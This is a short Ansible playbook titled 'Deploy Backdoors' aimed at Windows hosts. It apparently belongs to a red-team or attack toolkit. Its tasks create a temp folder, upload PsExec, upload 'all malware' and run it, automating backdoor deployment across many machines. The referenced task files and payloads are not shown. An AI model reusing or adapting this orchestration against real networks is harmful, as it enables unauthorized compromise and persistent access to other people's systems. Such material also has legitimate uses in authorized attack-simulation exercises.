-
  name: Deploy Backdoors
  hosts: windows
  strategy: free
  gather_facts: no
  tasks:
    - include: tasks/create_temp.yaml
    - include: tasks/upload_psexec.yaml
    - include: tasks/upload_all_malware.yaml
    - include: tasks/run_malware.yaml
